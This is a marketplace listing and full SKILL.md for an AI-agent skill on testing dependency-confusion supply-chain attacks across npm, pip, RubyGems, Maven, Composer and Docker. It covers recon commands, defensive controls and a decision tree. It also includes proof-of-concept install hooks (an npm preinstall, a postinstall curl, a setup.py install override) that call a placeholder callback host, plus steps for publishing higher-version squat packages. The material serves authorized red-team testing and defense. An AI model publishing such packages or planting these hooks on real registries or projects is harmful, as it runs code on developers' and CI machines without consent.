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Audit score 45

dependency-confusion

yaklang/hack-skills

Identify and test supply-chain dependency confusion vulnerabilities across npm, pip, Ruby, Maven, Composer, and Docker.

What is dependency-confusion?

Dependency confusion occurs when package managers resolve internal package names to attacker-controlled public registries, enabling malicious code execution during install. Use this skill to audit manifests for unprotected internal package names, test version-resolution behavior, and validate supply-chain controls in authorized red-team exercises.

  • Enumerate internal package names from manifests (package.json, requirements.txt, pom.xml, Gemfile, composer.json, Dockerfile)
  • Probe public registries for squattable package names without destructive actions
  • Understand ecosystem-specific resolver behavior (npm scopes, pip extra indexes, Maven repo order, Composer sources)
  • Design non-destructive proof-of-concept exploits using DNS/HTTP callbacks instead of data exfiltration
  • Identify missing or stale lockfiles that allow version drift toward public registries
  • Recommend defensive controls: scoped packages, pinned versions, lockfile enforcement, and registry isolation

How to install dependency-confusion

npx skills add https://github.com/yaklang/hack-skills --skill dependency-confusion
Prerequisites
  • Access to target manifests (package.json, requirements.txt, pom.xml, etc.) or authorization to audit them
  • Understanding of your organization's package-registry setup and resolver configuration
  • For PoC testing: a controlled callback server (e.g., Burp Collaborator, RequestBin, or internal lab) and write access to a test public-registry namespace
  • Familiarity with lifecycle hooks in your target ecosystem (npm scripts, setuptools, etc.)
Claude Code
Cursor
Windsurf
Cline

How to use dependency-confusion

  1. 1.Enumerate internal package names from committed manifests using grep, SBOM tools, or source-code review
  2. 2.Run ecosystem-specific recon commands (npm view, pip install --dry-run, gem search, Maven Central queries) to check if names are claimable on public registries
  3. 3.Review .npmrc, .pypirc, pom.xml repository order, and CI environment variables to understand resolver configuration and index precedence
  4. 4.Identify packages without exact-version pinning or missing lockfiles that could drift toward public feeds
  5. 5.For authorized testing: publish a higher-version PoC package with a callback hook to a controlled public-registry namespace and trigger install in a lab environment
  6. 6.Validate callback execution and document findings; remove test packages and clean up
  7. 7.Recommend defensive controls: scoped packages with org ownership, exact-version pinning, lockfile enforcement in CI, and registry isolation policies

Use cases

Good for
  • Audit a monorepo's internal package dependencies to identify which names could be claimed on public registries
  • Test whether a CI pipeline correctly enforces lockfiles or allows dynamic version resolution to public feeds
  • Validate that npm scopes are org-owned and .npmrc correctly routes private packages to internal registries
  • Assess pip environments using --extra-index-url to confirm version-resolution order and potential confusion
  • Perform authorized red-team supply-chain exercises with callback-based PoCs to prove execution risk
Who it's for
  • Security engineers conducting supply-chain risk assessments
  • DevSecOps teams hardening CI/CD pipelines and dependency resolution
  • Red teamers authorized to test organizational package-management security
  • Software architects designing internal package distribution strategies
  • Incident responders investigating suspected dependency-confusion compromises

dependency-confusion FAQ

What is the difference between npm scoped and unscoped packages in dependency confusion?

Scoped packages (@org-scope/pkg) are safer when the scope is owned by your organization on the registry, because the scope itself acts as a namespace boundary. Unscoped private-style names (e.g., acme-billing-sdk) are high-risk because they can be claimed by anyone on public registries. Misconfigured .npmrc files that don't route private scopes to internal registries increase risk.

How do lockfiles protect against dependency confusion?

Lockfiles (package-lock.json, poetry.lock, Gemfile.lock, composer.lock) pin exact versions and metadata, preventing the resolver from dynamically fetching newer versions from public registries during install. If lockfiles are missing, stale, or not enforced in CI, the build can drift toward attacker-controlled public packages with higher version numbers.

Can I test dependency confusion without publishing malicious code?

Yes. Use non-destructive proof-of-concept patterns: add lifecycle hooks that make DNS or HTTP callbacks to a collaborator server you control (e.g., Burp Collaborator, RequestBin), proving execution without data exfiltration or host modification. Only perform PoC testing in authorized lab environments with written permission.

Which ecosystems are most vulnerable to dependency confusion?

All major ecosystems are affected: npm (especially unscoped names), pip (via --extra-index-url), RubyGems, Maven (repository order), Composer, and Docker (image typosquatting). The risk depends on resolver configuration, registry order, and whether internal names are protected by scopes or registry isolation.

What tools can help identify dependency-confusion risks?

Use visma-prodsec/confused to scan manifests for claimable package names across ecosystems, or synacktiv/DepFuzzer for automated testing workflows. Always run these tools only on your own manifests or in authorized engagements; do not use them to squat names for unrelated third parties.

Full instructions (SKILL.md)

Source of truth, from yaklang/hack-skills.


name: dependency-confusion description: >- Supply-chain testing via package-manager dependency confusion: when internal package names resolve to attacker-controlled public registries, leading to malicious install and script execution. Use for npm/pip/gem/Maven/Composer/Docker manifest review and authorized red-team supply-chain exercises.

SKILL: Dependency Confusion — Supply Chain Attack Playbook

AI LOAD INSTRUCTION: Expert dependency-confusion methodology. Covers how private package names leak, how public registries can win version resolution, ecosystem-specific pitfalls (npm scopes, pip extra indexes, Maven repo order), recon commands, non-destructive PoC patterns (callbacks, not data exfil), and defensive controls. Pair with supply-chain recon workflows when manifests or CI caches are in scope. Only use on systems and programs you are authorized to test.

0. QUICK START

What to look for first

  • Manifests listing package names that look internal (short unscoped names, org-specific tokens, product codenames) without a hard-private registry lock.
  • Evidence the same name might exist—or be squattable—on a public registry with a higher semver than the private feed publishes.
  • Lockfiles missing, stale, or not enforced in CI so install/build can drift toward public metadata.

Fast mental model: If the resolver can see both private and public indexes, and version ranges allow it, the “newest” matching version may be the attacker’s.

Routing note: if the task comes from supply-chain, repository exposure, or CI-build recon, first use recon-for-sec to list internal package names and possible public-registry collisions.


1. CORE CONCEPT

  1. Private packages: An organization ships libraries only on an internal registry (or under conventions that imply “ours”), e.g. a scoped name like @org-scope/internal-utils or an unscoped name such as acme-billing-sdk.
  2. Attacker squats the name: The same package name is published on a public registry (npmjs, PyPI, RubyGems, etc.).
  3. Resolver preference: Many setups resolve highest matching version across all configured indexes (or merge metadata), so a public 9.9.9 can beat a private 1.2.3 if ranges allow.
  4. Execution: Package managers run lifecycle scripts (npm preinstall/postinstall, setuptools entry points, etc.) → attacker code runs on developer laptops, CI, or production image builds.

This is a supply-chain class issue: impact is often broad (many consumers) and silent until build or runtime hooks fire.


2. AFFECTED ECOSYSTEMS

EcosystemTypical manifestConfusion angle
npmpackage.jsonScoped packages (@scope/pkg) are safer when the scope is owned on the registry; unscoped private-style names are high risk. Multiple registries / .npmrc registry vs per-scope @scope:registry= misconfiguration increases risk.
piprequirements.txt, pyproject.toml, setup.pypip install -i / --extra-index-url merges indexes; a public index can serve a higher version for the same distribution name.
RubyGemsGemfilesource order and additional sources; ambiguous gem names reachable from rubygems.org.
Mavenpom.xmlRepository declaration order and mirror settings; a public repo publishing the same groupId:artifactId under a higher version can win if policy allows.
Composercomposer.jsonPackagist is default; private packages without repositories/canonical discipline may collide with public names.
DockerFROM, image tagsTyposquatting on container registries (e.g. public hub) for images with names similar to internal base images.

3. RECONNAISSANCE

Where internal names leak

  • Committed package.json, requirements.txt, Gemfile, pom.xml, composer.json in repos or forks.
  • JavaScript source maps, bundled assets, or error stack traces referencing package paths.
  • .npmrc, .pypirc, CI logs showing install URLs or mirror endpoints.
  • Issue trackers, gist snippets, and dependency graphs from SBOM exports.

Check public squatting / claimability (read-only)

# npm — metadata for a name (unscoped)
npm view some-internal-package-name version

# npm — scoped (requires scope to exist / be readable)
npm view @some-scope/internal-lib versions --json

# PyPI — dry-run style version probe (adjust name; fails if not found)
python3 -m pip install --dry-run 'some-internal-package-name==99.99.99'

# RubyGems — query remote
gem search '^some-internal-package-name$' --remote

# Maven Central — search coordinates (example pattern)
# curl "https://search.maven.org/solrsearch/select?q=g:com.example+AND+a:internal-lib&rows=1&wt=json"

Routing note: after package-name enumeration, consider PoC only in authorized environments; public registry lookups themselves are usually passive recon.


4. EXPLOITATION

Authorized testing pattern

  1. Register (or use a controlled namespace) the same package name on the public registry your target resolver can reach.
  2. Publish a higher semver than the legitimate internal line within the victim’s declared range (e.g. ^1.0.0 → publish 9.9.9).
  3. Add lifecycle hooks that prove execution without harming hosts—prefer DNS/HTTP callback to a collaborator you control, no destructive writes.

npm package.json — minimal callback-style PoC (illustrative)

{
  "name": "some-internal-package-name",
  "version": "9.9.9",
  "description": "authorized dependency-confusion PoC only",
  "scripts": {
    "preinstall": "node -e \"require('https').get('https://YOUR_CALLBACK_HOST/poc?t='+process.env.npm_package_name)\""
  }
}

npm package.json — shell + curl fallback (illustrative)

{
  "scripts": {
    "postinstall": "curl -fsS 'https://YOUR_CALLBACK_HOST/npm-postinstall' || true"
  }
}

pip — setup hook pattern (illustrative; use only in authorized lab packages)

# setup.py (excerpt)
from setuptools import setup
from setuptools.command.install import install

class PoCInstall(install):
    def run(self):
        import urllib.request
        urllib.request.urlopen("https://YOUR_CALLBACK_HOST/pip-install")
        install.run(self)

setup(
    name="some-internal-package-name",
    version="9.9.9",
    cmdclass={"install": PoCInstall},
)

Reference implementation (study / lab): community PoC layout and workflow similar to 0xsapra/dependency-confusion-exploit — automate version bump, publish, and callback confirmation only where you have written permission.


5. TOOLS

ToolRole
visma-prodsec/confusedScans manifest files for dependency names that may be claimable on public registries (multi-ecosystem).
synacktiv/DepFuzzerAutomated dependency confusion testing workflows (use strictly in-scope).

Run these only against your manifests or authorized engagements; do not use to squat names for unrelated third parties.


6. DEFENSE

  • npm: Prefer scoped packages (@org-scope/pkg) with org-owned scopes; set .npmrc so private scopes map to private registry and default registry is not accidentally public for internal names.
  • Pinning: Exact versions + lockfiles (package-lock.json, poetry.lock, Gemfile.lock, composer.lock) enforced in CI.
  • pip: Avoid careless --extra-index-url; prefer single private index with mirroring, or explicit --index-url policies in CI.
  • Maven / Gradle: Control repository order, use internal mirrors, and block unexpected groupIds on release pipelines.
  • Composer: Use repositories with canonical: true for private packages; verify Packagist is not introducing unexpected vendors.
  • Defensive registration: Reserve internal names on public registries (squat your own names) where policy allows.
  • Monitoring: Tools such as Socket.dev, Snyk, or similar SBOM/supply-chain scanners to alert on new publishers or version jumps for critical packages.

7. DECISION TREE

Do manifests reference package names that could be non-unique globally?
├─ NO → Dependency confusion unlikely from naming alone; pivot to typosquatting / compromised accounts.
└─ YES
    ├─ Is the private registry the ONLY source for that name (scoped + .npmrc / single index / mirror)?
    │   ├─ YES → Lower risk; still verify CI and developer machines do not override config.
    │   └─ NO → HIGH RISK
    │         ├─ Can a public registry publish a HIGHER version inside declared ranges?
    │         │   ├─ YES → Treat as exploitable in authorized tests; prove with callback PoC.
    │         │   └─ NO → Check pre-release tags, local `file:` deps, and stale lockfiles.
    │         └─ Are lifecycle scripts disabled/blocked in CI? (reduces impact, does not remove squat risk)

Related routing

  • From recon-for-sec: When doing supply-chain reconnaissance, cross-link leaked manifests and internal package identifiers with the checks in Section 3 and the decision tree in Section 7 before proposing any publish/PoC steps.